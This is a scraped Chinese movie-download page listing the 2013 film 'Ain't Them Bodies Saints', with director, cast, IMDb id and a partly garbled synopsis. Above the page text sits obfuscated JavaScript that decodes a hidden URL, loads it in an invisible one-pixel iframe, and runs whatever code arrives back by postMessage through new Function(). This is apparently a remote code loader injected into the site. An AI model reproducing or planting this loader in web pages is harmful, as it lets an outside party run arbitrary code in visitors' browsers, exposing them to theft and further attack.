if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 

他们非圣人/险路迷情 / 人非圣贤

资源:BD720P超清中英双字

类型:剧情片 剧情 2013

.

《他们非圣人/险路迷情 / 人非圣贤》迅雷下载

《他们非圣人/险路迷情 / 人非圣贤》剧情介绍

他们非圣人/险路迷情 / 人非圣贤影片剧照1

影片导演: 大卫·洛维

影片编剧: 大卫·洛维

影片主演: 鲁妮·玛拉 / 卡西·阿弗莱克 / 本·福斯特 / 拉米·马雷克 / 基思·卡拉丹 / 查尔斯·贝克 / 内特·派克 / 希瑟·卡夫卡

影片类型: 剧情 / 爱情 / 犯罪

影片制片国家/地区: 美国

影片语言: 英语

影片上映日期: 2013-08-16(美国)

影片片长: 96分钟

影片又名: 险路迷情 / 人非圣贤

影片IMDb: tt2388637

影片简介: 露丝跟鲍伯的感情十分的要好,就在两人一位幸福生活会持续的时候,不幸降临了。一次意外中,露丝误杀了一个警察,鲍伯决定顶替他入狱,过了美国就,露丝就为他生了一个孩子,带给了鲍伯新的希望,他每天都十分的想念自己的妻子和孩子,于是有了越狱的心。但是他没有想到,外面的世界早已经物是人非。

他们非圣人/险路迷情 / 人非圣贤影片剧照2

他们非圣人/险路迷情 / 人非圣贤影片剧照3


Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved